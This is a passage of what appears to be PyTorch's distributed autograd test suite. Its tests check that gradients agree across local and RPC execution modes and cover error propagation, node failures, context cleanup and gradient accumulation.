    for exec_mode in [ExecMode.LOCAL, ExecMode.RPC_SYNC, ExecMode.REMOTE]:
        with dist_autograd.context() as context_id:
            s = self._exec_func(exec_mode, torch.stack, (t1, t2, t3))
            # Only slices 0 and 2 of the stack are used; t2's slice is unused.
            val = self._exec_func(
                exec_mode,
                torch.matmul,
                torch.narrow(s, 0, 0, 1),
                torch.narrow(s, 0, 2, 1),
            )
            loss = val.sum()
            ret = self._verify_backwards(
                exec_mode, [loss], context_id, local_grads, t1, t2, t3
            )
            local_grads = ret if ret else local_grads
@dist_init
def test_backward_multiple_output_tensors(self):
    """Backward through an op (torch.split) that returns multiple tensors,
    only some of which feed the loss; grads must agree across exec modes."""
    local_grads = None
    t = torch.rand((10, 2), requires_grad=True)
    for exec_mode in [ExecMode.LOCAL, ExecMode.RPC_SYNC, ExecMode.REMOTE]:
        with dist_autograd.context() as context_id:
            tensor_list = self._exec_func(exec_mode, torch.split, t, 2)
            # Use only chunks 0, 2 and 4 of the five 2x2 splits.
            t1 = tensor_list[0]
            t2 = tensor_list[2]
            t3 = tensor_list[4]
            val = self._exec_func(exec_mode, torch.linalg.multi_dot, (t1, t2, t3))
            loss = val.sum()
            ret = self._verify_backwards(
                exec_mode, [loss], context_id, local_grads, t
            )
            local_grads = ret if ret else local_grads
def _run_test_backward_unused_send_function_in_thread(self):
    """Intentionally hang: run backward on a graph whose RPC send function
    never receives a gradient. Run inside a daemon thread by the caller,
    which then asserts this function is still blocked."""
    with dist_autograd.context() as context_id:
        t1 = torch.rand((3, 3), requires_grad=True)
        t2 = torch.rand((3, 3), requires_grad=True)
        # We don't use the result of an RPC function, as a result the
        # backward pass would hang in the "FAST" mode.
        res = rpc.rpc_sync(
            worker_name(self._next_rank()), torch.add, args=(t1, t2)
        )
        val = torch.mul(t1, t2)
        # Run backward, this would hang forever.
        dist_autograd.backward(context_id, [val.sum()])
@dist_init
def test_backward_unused_send_function(self):
    """Backward over a graph with an unused send function must block
    (FAST-mode semantics) rather than complete."""
    # Run the test in a thread which would never finish.
    t = threading.Thread(
        target=self._run_test_backward_unused_send_function_in_thread
    )
    t.daemon = True
    t.start()
    t.join(10)  # Wait for 10s.
    # Verify thread is still alive (indicating backward hasn't completed yet).
    self.assertTrue(t.is_alive())
@dist_init
def test_backward_autograd_engine_error(self):
    """An error raised deep in the backward chain (via SimulateBackwardError)
    must propagate back to the node that initiated backward."""
    with dist_autograd.context() as context_id:
        t1 = torch.rand((3, 3), requires_grad=True)
        t2 = torch.rand((3, 3), requires_grad=True)
        # Perform some ops before error simulation.
        tmp = (t1 + t2) * (t1 + t2)
        t3 = SimulateBackwardError.apply(tmp)
        # Run multiple round trips across different nodes and verify the
        # original node receives an error thrown on a node deep in the chain.
        val = rpc.rpc_sync(
            worker_name(self._next_rank()), torch.add, args=(t2, t3)
        )
        val = rpc.rpc_sync(
            worker_name(self._next_rank()), torch.mul, args=(val, t2)
        )
        val = rpc.rpc_sync(
            worker_name(self._next_rank()), torch.matmul, args=(val, t2)
        )
        val = rpc.rpc_sync(
            worker_name(self._next_rank()), torch.div, args=(val, t2)
        )
        with self.assertRaisesRegex(
            RuntimeError, "Error on Node [0-9]+: Simulate error on backward pass"
        ):
            # Run backwards, and validate we receive an error.
            dist_autograd.backward(context_id, [val.sum()])
@dist_init(clean_shutdown=False)
@sandcastle_skip_if(
    IS_MACOS,
    "Test is flaky on MacOS since libuv error handling is not as robust as TCP",
)
def test_backward_node_failure(self):
    """Odd ranks exit abruptly; surviving even ranks must get a shutdown
    error (not a hang) when running backward against the dead peers."""
    rpc._set_rpc_timeout(5)  # 5 seconds
    initialize_pg(self.file_init_method, self.rank, self.world_size)
    with dist_autograd.context() as context_id:
        t1 = torch.rand((3, 3), requires_grad=True)
        t2 = torch.rand((3, 3), requires_grad=True)
        res = rpc.rpc_sync(
            worker_name(self._next_rank()), torch.add, args=(t1, t2)
        )
        # Wait for all RPCs to be done.
        dist.barrier()
        # Kill all odd rank nodes.
        if self.rank % 2 == 0:
            shutdown_error_regex = self.get_shutdown_error_regex()
            # Wait for all other nodes to die.
            for rank in range(self.world_size):
                if rank % 2 != 0:
                    wait_until_node_failure(rank, shutdown_error_regex)
            # Shutdown sequence is not very well defined and as a result
            # we might see any error given by get_shutdown_error_regex()
            with self.assertRaisesRegex(RuntimeError, shutdown_error_regex):
                # Run backwards, and validate we receive an error since all
                # other nodes are dead.
                dist_autograd.backward(context_id, [res.sum()])
        else:
            # Exit all other nodes (odd ranks simply fall out of the test;
            # clean_shutdown=False makes that an abrupt departure).
            pass
@dist_init
def test_backward_without_context(self):
    """A backward() call with an unregistered context id must raise."""
    bogus_context_id = 100  # never created by the autograd engine
    x = torch.rand((3, 3), requires_grad=True)
    y = torch.rand((3, 3), requires_grad=True)
    expected_msg = "Could not find autograd context with id: {}".format(
        bogus_context_id
    )
    with self.assertRaisesRegex(RuntimeError, expected_msg):
        result = rpc.rpc_sync(
            worker_name(self._next_rank()), torch.add, args=(x, y)
        )
        dist_autograd.backward(bogus_context_id, [result.sum()])
@dist_init
def test_backward_without_rpc(self):
    """Distributed backward over a purely local graph matches autograd."""
    dst_rank = self.rank
    with dist_autograd.context() as context_id:
        a = torch.rand((3, 3), requires_grad=True)
        b = torch.rand((3, 3), requires_grad=True)
        total = torch.add(a, b)
        dist_autograd.backward(context_id, [total.sum()])
        grads = dist_autograd.get_gradients(context_id)
        self.assertEqual(2, len(grads))
        # d(sum(a + b))/da == d(sum(a + b))/db == ones.
        for leaf in (a, b):
            self.assertIn(leaf, grads)
            self.assertEqual(torch.ones(3, 3), grads[leaf])
@dist_init
def test_backward_invalid_args(self):
    """backward() must reject malformed roots and context ids."""
    with dist_autograd.context() as context_id:
        # Roots must be a list of tensors.
        with self.assertRaisesRegex(TypeError, "incompatible function arguments"):
            dist_autograd.backward(context_id, None)
        # The context id must be an integer.
        with self.assertRaisesRegex(TypeError, "incompatible function arguments"):
            dist_autograd.backward(None, None)
        # An empty list of roots is meaningless.
        with self.assertRaisesRegex(
            RuntimeError, "No tensors provided for gradient computation"
        ):
            dist_autograd.backward(context_id, [])
        # Every root must require grad.
        with self.assertRaisesRegex(RuntimeError, "requires_grad not set on"):
            no_grad_root = torch.rand(3, 3)
            dist_autograd.backward(context_id, [no_grad_root])
        # Every root must be a scalar.
        with self.assertRaisesRegex(
            RuntimeError, "is not a scalar, all roots need to be scalar"
        ):
            non_scalar_root = torch.rand(3, 3, requires_grad=True)
            dist_autograd.backward(context_id, [non_scalar_root])
        # Every root must be part of an autograd graph.
        with self.assertRaisesRegex(
            RuntimeError, "does not have a valid gradient function"
        ):
            leaf_root = torch.rand(1, requires_grad=True)
            dist_autograd.backward(context_id, [leaf_root])
@dist_init
def test_backward_multiple_roots(self):
    """Backward with several scalar roots matches local autograd."""
    t1 = torch.rand((3, 3), requires_grad=True)
    t2 = torch.rand((3, 3), requires_grad=True)
    local_grads = None
    for exec_mode in (ExecMode.LOCAL, ExecMode.RPC_SYNC):
        with dist_autograd.context() as context_id:
            roots = [
                self._exec_func(exec_mode, torch.add, t1, t2).sum(),
                self._exec_func(exec_mode, torch.mul, t1, t2).sum(),
                self._exec_func(exec_mode, torch.cos, t1).sum(),
                self._exec_func(exec_mode, torch.div, t1, t2).sum(),
            ]
            local_grads = self._verify_backwards(
                exec_mode, roots, context_id, local_grads, t1, t2
            )
def _backward_different_dtypes(self, t1, t2):
    """Compare local vs. remote backward when the inputs differ in dtype."""
    local_grads = None
    for exec_mode in (ExecMode.LOCAL, ExecMode.REMOTE):
        with dist_autograd.context() as context_id:
            added = self._exec_func(exec_mode, torch.add, t1, t2)
            local_grads = self._verify_backwards(
                exec_mode, [my_sum(added)], context_id, local_grads, t1, t2
            )
@dist_init
def test_backward_different_dtypes(self):
    """Dense float32 + float64 inputs."""
    f32 = torch.rand((3, 3), requires_grad=True, dtype=torch.float32)
    f64 = torch.rand((3, 3), requires_grad=True, dtype=torch.float64)
    self._backward_different_dtypes(f32, f64)
@dist_init
def test_backward_different_dtypes_sparse(self):
    """Sparse float32 + float64 inputs."""
    sparse32 = build_sparse_tensor(requires_grad=True, dtype=torch.float32)
    sparse64 = build_sparse_tensor(requires_grad=True, dtype=torch.float64)
    self._backward_different_dtypes(sparse32, sparse64)
# Run the same code locally and with dist autograd and verify gradients
# are same.
def _backward_simple_python_udf(self, t1, t2):
    """Backward through a Python UDF, local vs. remote execution."""
    local_grads = None
    for exec_mode in (ExecMode.LOCAL, ExecMode.REMOTE):
        with dist_autograd.context() as context_id:
            udf_out = self._exec_func(exec_mode, my_py_add, t1, t2)
            local_grads = self._verify_backwards(
                exec_mode, [my_sum(udf_out)], context_id, local_grads, t1, t2
            )
@dist_init
def test_backward_simple_python_udf(self):
    """Dense inputs through the Python UDF path."""
    x = torch.rand(3, 3, requires_grad=True)
    y = torch.rand(3, 3, requires_grad=True)
    self._backward_simple_python_udf(x, y)
@dist_init
def test_backward_simple_python_udf_sparse(self):
    """Sparse inputs through the Python UDF path."""
    x = build_sparse_tensor(requires_grad=True)
    y = build_sparse_tensor(requires_grad=True)
    self._backward_simple_python_udf(x, y)
# Run the same code locally and with dist autograd and verify gradients
# are same.
def _backward_simple_script_call(self, t1, t2):
    """Backward through a TorchScript function under every exec mode."""
    all_modes = (
        ExecMode.LOCAL,
        ExecMode.RPC_SYNC,
        ExecMode.RPC_ASYNC,
        ExecMode.REMOTE,
    )
    local_grads = None
    for exec_mode in all_modes:
        with dist_autograd.context() as context_id:
            script_out = self._exec_func(exec_mode, my_script_add, t1, t2)
            loss = my_sum(script_out)
            verified = self._verify_backwards(
                exec_mode, [loss], context_id, local_grads, t1, t2
            )
            # _verify_backwards only returns grads for some modes; keep
            # the last non-empty result as the reference.
            if verified:
                local_grads = verified
@dist_init
def test_backward_simple_script_call(self):
    """Dense inputs through the TorchScript path."""
    x = torch.rand(3, 3, requires_grad=True)
    y = torch.rand(3, 3, requires_grad=True)
    self._backward_simple_script_call(x, y)
@dist_init
def test_backward_simple_script_call_sparse(self):
    """Sparse inputs through the TorchScript path."""
    x = build_sparse_tensor(requires_grad=True)
    y = build_sparse_tensor(requires_grad=True)
    self._backward_simple_script_call(x, y)
@staticmethod
def _complex_python_udf(t1, t2):
t3 = torch.nn.functional.linear(t1, t2)
t4 = torch.nn.functional.linear(t2, t3)
t5 = torch.nn.functional.linear(t3, t4)
return torch.linalg.multi_dot([t1, t2, t3, t4, t5])
@dist_init
def test_backward_complex_python_udf(self):
    """Gradients through _complex_python_udf match local execution."""
    t1 = torch.rand((3, 3), requires_grad=True)
    t2 = torch.rand((3, 3), requires_grad=True)
    local_grads = None
    for exec_mode in (ExecMode.LOCAL, ExecMode.REMOTE):
        with dist_autograd.context() as context_id:
            udf_out = self._exec_func(
                exec_mode, DistAutogradTest._complex_python_udf, t1, t2
            )
            local_grads = self._verify_backwards(
                exec_mode, [udf_out.sum()], context_id, local_grads, t1, t2
            )
@staticmethod
def _python_udf_with_backward_error(t1, t2):
    # UDF whose forward succeeds but whose backward raises: the
    # SimulateBackwardError node injects a failure during the backward pass.
    t3 = t1 + t2
    t4 = SimulateBackwardError.apply(t3)
    return torch.linalg.multi_dot([t1, t2, t3, t4])
@staticmethod
def _nested_rpc_call_backward_error(t1, t2, dst):
    # Forward the failing-backward UDF through one more RPC hop so the
    # backward error has to propagate across multiple nodes.
    t1 = t1 * t2
    t2 = t1 + t2
    res = rpc.rpc_sync(
        worker_name(dst),
        DistAutogradTest._python_udf_with_backward_error,
        args=(t1, t2),
    )
    return torch.linalg.multi_dot([t1, t2, res])
@dist_init
def test_backward_python_udf_error(self):
    """An error raised deep in a nested RPC backward reaches the caller."""
    x = torch.rand((3, 3), requires_grad=True)
    y = torch.rand((3, 3), requires_grad=True)
    with dist_autograd.context() as context_id:
        loss = rpc.rpc_sync(
            worker_name(self._next_rank()),
            DistAutogradTest._nested_rpc_call_backward_error,
            args=(x, y, self._next_rank()),
        )
        with self.assertRaisesRegex(
            RuntimeError, "Simulate error on backward pass"
        ):
            dist_autograd.backward(context_id, [loss.sum()])
_backward_done = False
@dist_init(clean_shutdown=False)
@sandcastle_skip_if(
    IS_MACOS,
    "Test is flaky on MacOS since libuv error handling is not as robust as TCP",
)
def test_backward_node_failure_python_udf(self):
    """Verify rank 0 sees an error when the last hop of a nested RPC dies.

    Rank 2 exits early; rank 0 runs backward over a graph that includes
    rank 2 and must observe a shutdown error. The c10d store is used for
    the final sync because RPC may already be broken at that point.
    """
    # Set a short timeout to quickly time out failed RPCs.
    rpc._set_rpc_timeout(5)  # 5 seconds
    initialize_pg(self.file_init_method, self.rank, self.world_size)
    with dist_autograd.context() as context_id:
        t1 = torch.rand((3, 3), requires_grad=True)
        t2 = torch.rand((3, 3), requires_grad=True)
        dst = self._next_rank()
        res = rpc.rpc_sync(
            worker_name(dst),
            my_py_nested_call,
            args=(t1, t2, dst, self.world_size, 1),
        )
        # Ensure every rank finished its forward RPCs before any rank exits.
        dist.barrier()
        # Kill rank 2 (last hop of nested rpc) and verify rank 0 receives an error.
        if self.rank == 2:
            return
        store = dist.distributed_c10d._get_default_store()
        if self.rank == 0:
            # Wait for rank 2 to die.
            shutdown_error_regex = self.get_shutdown_error_regex()
            wait_until_node_failure(2, shutdown_error_regex)
            # Shutdown sequence is not very well defined and as a result
            # we might see any error given by get_shutdown_error_regex().
            with self.assertRaisesRegex(RuntimeError, shutdown_error_regex):
                # Run backwards, and validate we receive an error since rank 2 is dead.
                dist_autograd.backward(context_id, [res.sum()])
            # Mark rank 0 is done in the store, since the RPC framework on
            # some nodes might be broken at this point.
            store.set('test_backward_node_failure_python_udf_rank0_done', "True")
        else:
            # Wait for backward to finish on rank 0.
            store.wait(['test_backward_node_failure_python_udf_rank0_done'], timedelta(seconds=10))
@staticmethod
def _nested_python_udf(t1, t2, dst):
    # UDF that itself performs an RPC, building an autograd graph that
    # nests across a third node.
    t3 = t1 * t2
    t4 = t1 + t2
    res = rpc.rpc_sync(worker_name(dst), my_py_add, args=(t3, t4))
    return t1 * t2 * t3 * t4 * res
def _backwards_nested_python_udf(self, t1, t2):
    """Compare local autograd against dist autograd over a nested-RPC UDF."""
    # Reproduce _nested_python_udf locally so t1.grad / t2.grad hold the
    # reference gradients.
    t3 = t1 * t2
    t4 = t1 + t2
    res = t3 + t4
    ret = t1 * t2 * t3 * t4 * res
    loss = my_sum(ret)
    torch.autograd.backward([loss])
    # Now run distributed autograd.
    with dist_autograd.context() as context_id:
        ret = rpc.rpc_sync(
            worker_name(self._next_rank()),
            DistAutogradTest._nested_python_udf,
            args=(t1, t2, self._next_rank()),
        )
        loss = my_sum(ret)
        dist_autograd.backward(context_id, [loss])
        grads = dist_autograd.get_gradients(context_id)
        # Distributed gradients must match the local reference.
        self.assertEqual(t1.grad, grads[t1])
        self.assertEqual(t2.grad, grads[t2])
@dist_init
def test_backwards_nested_python_udf(self):
    """Dense-tensor variant of the nested Python UDF backward check."""
    x = torch.rand(3, 3, requires_grad=True)
    y = torch.rand(3, 3, requires_grad=True)
    self._backwards_nested_python_udf(x, y)
@dist_init
def test_backwards_nested_python_udf_sparse(self):
    """Sparse-tensor variant of the nested Python UDF backward check."""
    x = build_sparse_tensor(requires_grad=True)
    y = build_sparse_tensor(requires_grad=True)
    self._backwards_nested_python_udf(x, y)
_test_clean_context_backward_context_id = None
class MyBackwardFunc(Function):
    # Identity forward; backward deliberately releases the autograd
    # context mid-pass to exercise cleanup-during-backward handling.
    @staticmethod
    def forward(ctx, input):
        return input
    @staticmethod
    @once_differentiable
    def backward(ctx, input):
        assert DistAutogradTest._test_clean_context_backward_context_id is not None
        # Release the context to simulate error (use barrier before releasing
        # context to ensure all nodes execute the backward function).
        dist.barrier()
        dist_autograd._release_context(
            DistAutogradTest._test_clean_context_backward_context_id
        )
        # Verify all contexts are cleaned up.
        assert _all_contexts_cleaned_up()
        return input
@dist_init
def test_clean_context_during_backward(self):
    """
    This test simulates the situation where the 'backward' call might throw
    an exception locally which would lead to the autograd context being
    cleaned up if we're using the context manager. As a result, the autograd
    context might be cleaned up while some threads are still using the
    autograd context.
    It is fine for the 'backward' call to throw an exception in this test,
    but the process should not crash.
    """
    initialize_pg(self.file_init_method, self.rank, self.world_size)
    # Create the context manually (not via the context manager) so
    # MyBackwardFunc can release it mid-backward.
    context = dist_autograd._new_context()
    context_id = context._context_id()
    DistAutogradTest._test_clean_context_backward_context_id = context_id
    # Send the context id to all nodes.
    for i in range(0, self.world_size):
        if i != self.rank:
            rank_distance = (i - self.rank + self.world_size) % self.world_size
            rpc.rpc_sync(
                worker_name(i),
                _set_rpc_done,
                args=(context_id, rank_distance),
            )
    dist.barrier()
    # Verify all context ids have been received.
    self.assertEqual(self.world_size - 1, len(known_context_ids))
    t1 = torch.rand((3, 3), requires_grad=True)
    for i in range(0, 100):
        dst = self._next_rank()
        t1 = rpc.rpc_sync(worker_name(dst), torch.add, args=(t1, t1))
    # Call MyBackwardFunc as the first op of the backward pass to
    # ensure we release the context early in the backward pass.
    t1 = DistAutogradTest.MyBackwardFunc.apply(t1)
    self.assertEqual(100, len(context._send_functions()))
    context_id = 100  # dummy context_id
    with self.assertRaisesRegex(
        RuntimeError,
        "Could not find autograd context with id: {}".format(context_id),
    ):
        dist_autograd.backward(context_id, [t1.sum()])
    # HACK: Killing workers since otherwise the autograd engine gets stuck on
    # other nodes. The proper fix would be addressing:
    # https://github.com/pytorch/pytorch/issues/27643, which would inform
    # other nodes about the failure.
    # The autograd engine gets stuck on other nodes since they're waiting to
    # receive gradients from the node that received an error (and as a
    # result it didn't execute the rest of the graph).
    dist.barrier()
    rpc.shutdown(graceful=False)
    sys.exit(0)
@classmethod
def _call_remote_embedding(cls, embedding_rref, input, offsets, per_sample_weights):
    # Runs on the embedding's owner: unwrap the RRef and do the lookup.
    embedding = embedding_rref.local_value()
    return embedding(input, offsets, per_sample_weights)
@classmethod
def _get_grad(cls, embedding_rref, context_id):
    # Runs on the embedding's owner: fetch the gradient accumulated for
    # the embedding weight in the given dist autograd context.
    embedding = embedding_rref.local_value()
    grad_map = dist_autograd.get_gradients(context_id)
    return grad_map[embedding.weight]
@dist_init
def test_embedding_bag_with_no_grad_tensors(self):
    """Sparse EmbeddingBag grads accumulate identically local vs. remote,
    even though some forward args (input/offsets) don't require grad."""
    dst = self._next_rank()
    remote_embedding = rpc.remote(
        worker_name(dst),
        torch.nn.EmbeddingBag,
        args=(16, 16),
        kwargs={"mode": "sum", "sparse": True},
    )
    local_embedding = torch.nn.EmbeddingBag(16, 16, mode="sum", sparse=True)
    input = torch.LongTensor([1, 2, 4, 5, 4, 3, 2, 9])
    # requires_grad = True to record send/recv functions
    per_sample_weights = torch.rand((8), requires_grad=True)
    offsets = torch.LongTensor([0, 4])
    local_res = local_embedding(input, offsets, per_sample_weights)
    # Run backward twice.
    torch.autograd.backward([local_res.sum()], retain_graph=True)
    torch.autograd.backward([local_res.sum()])
    local_grad = local_embedding.weight.grad
    with dist_autograd.context() as context_id:
        res = rpc.rpc_sync(
            worker_name(dst),
            DistAutogradTest._call_remote_embedding,
            args=(remote_embedding, input, offsets, per_sample_weights),
        )
        # Run backward twice to test accumulation of sparse gradients.
        dist_autograd.backward(context_id, [res.sum()], retain_graph=True)
        dist_autograd.backward(context_id, [res.sum()])
        remote_grad = rpc.rpc_sync(
            worker_name(dst),
            DistAutogradTest._get_grad,
            args=(remote_embedding, context_id),
        )
        self.assertEqual(local_grad, remote_grad)
@classmethod
def _mixed_requires_grad_operaton(cls, t1, t2):
if t2.requires_grad:
return t1 - t2
else:
return t1 * t2
def _mixed_requires_grad(self, t1, t2):
    """Backward when only one input requires grad (t1 yes, t2 no)."""
    for exec_mode in [ExecMode.RPC_SYNC, ExecMode.REMOTE]:
        with dist_autograd.context() as context_id:
            ret = self._exec_func(
                exec_mode, DistAutogradTest._mixed_requires_grad_operaton, t1, t2
            )
            # t2.requires_grad is False, so the helper takes the multiply branch.
            self.assertEqual(t1 * t2, ret)
            loss = my_sum(ret)
            dist_autograd.backward(context_id, [loss])
            self.assertTrue(t1.requires_grad)
            self.assertFalse(t2.requires_grad)
            grads = dist_autograd.get_gradients(context_id)
            # Only t1 should get a gradient.
            self.assertIn(t1, grads)
            self.assertNotIn(t2, grads)
            # d(t1 * t2)/dt1 == t2.
            self.assertEqual(t2, grads[t1])
@dist_init
def test_mixed_requires_grad(self):
    """Dense inputs: only the first requires grad."""
    with_grad = torch.rand(3, 3, requires_grad=True)
    without_grad = torch.rand(3, 3, requires_grad=False)
    self._mixed_requires_grad(with_grad, without_grad)
@dist_init
def test_mixed_requires_grad_sparse(self):
    """Sparse inputs: only the first requires grad."""
    with_grad = build_sparse_tensor(requires_grad=True)
    without_grad = build_sparse_tensor(requires_grad=False)
    self._mixed_requires_grad(with_grad, without_grad)
class TestDebugInfoFunc(Function):
    # Identity forward; backward snapshots dist autograd debug info while
    # a backward pass is in flight on every node.
    @staticmethod
    def forward(ctx, input):
        return input
    @staticmethod
    @once_differentiable
    def backward(ctx, input):
        debug_info = dist_autograd._get_debug_info()
        assert debug_info is not None
        backward_passes = int(debug_info["num_current_backward_passes"])
        # Hard to validate exact numbers because of the distributed nature.
        # We can't use a barrier() here since that would block the single
        # CPU thread available for autograd and can cause deadlocks.
        assert backward_passes >= 1 and backward_passes <= 4
        return input
@dist_init
def test_debug_info(self):
    """Debug info reports sane backward-pass and context counts, and all
    counters drop to zero once contexts are cleaned up."""
    initialize_pg(self.file_init_method, self.rank, self.world_size)
    t1 = torch.rand((3, 3), requires_grad=True)
    t2 = torch.rand((3, 3), requires_grad=True)
    with dist_autograd.context() as context_id:
        i = 0
        res = {}
        res[i] = t1
        # One RPC add per peer rank before the custom function.
        for rank in range(self.world_size):
            if rank != self.rank:
                res[i + 1] = rpc.rpc_sync(
                    worker_name(rank), torch.add, args=(res[i], t2)
                )
                i += 1
        # Call custom function in middle of backward pass to ensure all
        # nodes are still waiting on a backward().
        res[i + 1] = DistAutogradTest.TestDebugInfoFunc.apply(res[i])
        i += 1
        # One more RPC add per peer rank after the custom function.
        for rank in range(self.world_size):
            if rank != self.rank:
                res[i + 1] = rpc.rpc_sync(
                    worker_name(rank), torch.add, args=(res[i], t2)
                )
                i += 1
        dist_autograd.backward(context_id, [res[i].sum()])
        debug_info = dist_autograd._get_debug_info()
        num_autograd_context = int(debug_info["num_autograd_contexts"])
        # Need at least one context and not more than 4.
        self.assertTrue(num_autograd_context >= 1 and num_autograd_context <= 4)
    # Tell each peer this rank is done so they can release their contexts.
    for rd in range(self.world_size - 1):
        rpc.rpc_sync(
            worker_name((self.rank + rd + 1) % self.world_size),
            _set_rpc_done,
            args=(context_id, rd + 1),
        )
    dist.barrier()
    # Validate information
    debug_info = dist_autograd._get_debug_info()
    assert debug_info is not None
    self.assertEqual(0, int(debug_info["num_current_backward_passes"]))
    # only have `num_current_backward_passes` and `num_autograd_contexts`
    self.assertTrue(len(debug_info) == 2)
    self.assertTrue(_all_contexts_cleaned_up())
    # All contexts should be cleaned up.
    debug_info = dist_autograd._get_debug_info()
    self.assertEqual(0, int(debug_info["num_autograd_contexts"]))
@staticmethod
def _workload_thread():
    # One worker-thread workload: a chain of RPCs to worker0 followed by
    # a distributed backward, used to hammer a single node concurrently.
    t1 = torch.rand((3, 3), requires_grad=True)
    t2 = torch.rand((3, 3), requires_grad=True)
    with dist_autograd.context() as context_id:
        t3 = rpc.rpc_sync("worker0", torch.add, args=(t1, t2))
        t4 = rpc.rpc_sync("worker0", torch.mul, args=(t2, t3))
        t5 = rpc.rpc_sync("worker0", torch.matmul, args=(t3, t4))
        t6 = rpc.rpc_sync("worker0", torch.add, args=(t4, t5))
        dist_autograd.backward(context_id, [t6.sum()])
@dist_init
def test_async_dist_autograd(self):
    """
    This test ensures async processing for distributed autograd works
    appropriately. This is achieved by spawning multiple threads and
    hammering a single node with a lot of backward() calls.
    """
    initialize_pg(self.file_init_method, self.rank, self.world_size)
    if self.rank != 0:
        # All other ranks schedule work on rank 0.
        threads = []
        for i in range(20):
            t = threading.Thread(target=DistAutogradTest._workload_thread)
            t.start()
            threads.append(t)
        for thread in threads:
            thread.join()
    # Rank 0 just services requests; everyone syncs before teardown.
    dist.barrier()
@dist_init
def test_backward_accumulate_grads(self):
    """Two backward passes accumulate the same grads locally and remotely."""
    t1 = torch.rand((3, 3), requires_grad=True)
    t2 = torch.rand((3, 3), requires_grad=True)
    with dist_autograd.context() as context_id:
        t3 = torch.matmul(t1, t2)
        # Run backward twice (local reference accumulates into .grad).
        torch.autograd.backward([t3.sum()], retain_graph=True)
        torch.autograd.backward([t3.sum()])
        t3 = rpc.rpc_sync(
            worker_name(self._next_rank()), torch.matmul, args=(t1, t2)
        )
        # Run backward twice (distributed accumulates into the context).
        dist_autograd.backward(context_id, [t3.sum()], retain_graph=True)
        dist_autograd.backward(context_id, [t3.sum()])
        # Verify the gradients are same for local and remote execution.
        grads = dist_autograd.get_gradients(context_id)
        self.assertEqual(2, len(grads))
        self.assertIn(t1, grads)
        self.assertIn(t2, grads)
        self.assertEqual(t1.grad, grads[t1])
        self.assertEqual(t2.grad, grads[t2])
@staticmethod
def _test_nested_backward_accumulate_grads(t1, t2, dst_rank):
    # One extra RPC hop so the backward graph nests across nodes.
    return rpc.rpc_sync(worker_name(dst_rank), torch.add, args=(t1, t2))
def _nested_backward_accumulate_grads(self, t1, t2):
    """Run backward twice over a nested-RPC graph to exercise accumulation."""
    with dist_autograd.context() as context_id:
        out = rpc.rpc_sync(
            worker_name(self._next_rank()),
            DistAutogradTest._test_nested_backward_accumulate_grads,
            args=(t1, t2, self._next_rank()),
        )
        loss = my_sum(out)
        # First pass keeps the graph alive; second reuses it.
        dist_autograd.backward(context_id, [loss], retain_graph=True)
        dist_autograd.backward(context_id, [loss])
@dist_init
def test_nested_backward_accumulate_grads(self):
    """Dense-tensor variant of nested grad accumulation."""
    x = torch.rand(3, 3, requires_grad=True)
    y = torch.rand(3, 3, requires_grad=True)
    self._nested_backward_accumulate_grads(x, y)
@dist_init
def test_nested_backward_accumulate_grads_sparse(self):
    """Sparse-tensor variant of nested grad accumulation."""
    x = build_sparse_tensor(requires_grad=True)
    y = build_sparse_tensor(requires_grad=True)
    self._nested_backward_accumulate_grads(x, y)
def _multiple_backward(self, t1, t2):
    """Run many retain_graph backward passes over one remote graph."""
    with dist_autograd.context() as context_id:
        summed = rpc.rpc_sync(
            worker_name(self._next_rank()),
            torch.add,
            args=(t1, t2))
        loss = my_sum(summed)
        # Run backward in a loop multiple times over the same graph.
        for _ in range(1000):
            dist_autograd.backward(context_id, [loss], retain_graph=True)
@dist_init
def test_multiple_backward(self):
    """Dense-tensor variant of repeated backward passes."""
    x = torch.rand(3, 3, requires_grad=True)
    y = torch.rand(3, 3, requires_grad=True)
    self._multiple_backward(x, y)
@dist_init
def test_multiple_backward_sparse(self):
    """Sparse-tensor variant of repeated backward passes."""
    x = build_sparse_tensor(requires_grad=True)
    y = build_sparse_tensor(requires_grad=True)
    self._multiple_backward(x, y)
@dist_init(clean_shutdown=False)
def test_multiple_backward_with_errors(self):
    """Repeated backward passes recover after a simulated backward error.

    Iterations 0-49 expect the injected failure; iteration 50 clears the
    flag in lockstep (barriers on both sides); iterations 51-99 must
    succeed on the recovered graph.
    """
    initialize_pg(self.file_init_method, self.rank, self.world_size)
    t1 = torch.rand((3, 3), requires_grad=True)
    t2 = torch.rand((3, 3), requires_grad=True)
    with dist_autograd.context() as context_id:
        loss = rpc.rpc_sync(
            'worker{}'.format(self._next_rank()),
            DistAutogradTest._python_udf_with_backward_error,
            args=(t1, t2)).sum()
        try:
            # Run backward in a loop multiple times.
            for i in range(100):
                if i < 50:
                    with self.assertRaisesRegex(RuntimeError, "Simulate error on backward pass"):
                        dist_autograd.backward(context_id, [loss], retain_graph=True)
                elif i > 50:
                    # Recovered from error.
                    dist_autograd.backward(context_id, [loss], retain_graph=True)
                else:
                    # i == 50: disable error injection on all ranks together.
                    dist.barrier()
                    SimulateBackwardError._simulate_error = False
                    dist.barrier()
        finally:
            # Sync before resetting flag.
            dist.barrier()
            # Reset the flag.
            SimulateBackwardError._simulate_error = True
@dist_init
def test_backward_verify_hooks(self):
    """Tensor hooks registered before dist backward still fire."""
    t1 = torch.ones((3, 3), requires_grad=True)
    t1.register_hook(lambda grad: grad * 2)  # double the gradient
    t2 = torch.ones((3, 3), requires_grad=True)
    local_grads = None
    for exec_mode in (ExecMode.LOCAL, ExecMode.RPC_SYNC, ExecMode.REMOTE):
        with dist_autograd.context() as context_id:
            product = self._exec_func(exec_mode, torch.matmul, t1, t2)
            verified = self._verify_backwards(
                exec_mode, [product.sum()], context_id, local_grads, t1, t2
            )
            if verified:
                local_grads = verified
@dist_init
def test_no_grad_copy(self):
    '''
    Similar to test in test_autograd.py.

    Checks when distributed autograd steals a gradient buffer (no copy)
    versus when it must clone: single-consumer contiguous grads are
    stolen, shared or non-contiguous grads are copied.
    '''
    # create autograd function that saves grad pointer as class static
    class MyFunc(Function):
        static_grad_ptr = None
        @staticmethod
        def forward(ctx, inp1, inp2):
            return inp1 + inp2
        @staticmethod
        def backward(ctx, grad):
            MyFunc.static_grad_ptr = grad.data_ptr()
            # Same grad tensor returned for both inputs.
            return grad, grad
    class MyFuncSingleGrad(Function):
        static_grad_ptr = None
        @staticmethod
        def forward(ctx, inp):
            return inp
        @staticmethod
        def backward(ctx, grad):
            MyFuncSingleGrad.static_grad_ptr = grad.data_ptr()
            return grad
    class NonContGradFunc(Function):
        # Produces a non-contiguous (expanded) gradient on backward.
        @staticmethod
        def forward(ctx, inp1):
            ctx.size = inp1.size()
            return torch.tensor([1.])
        @staticmethod
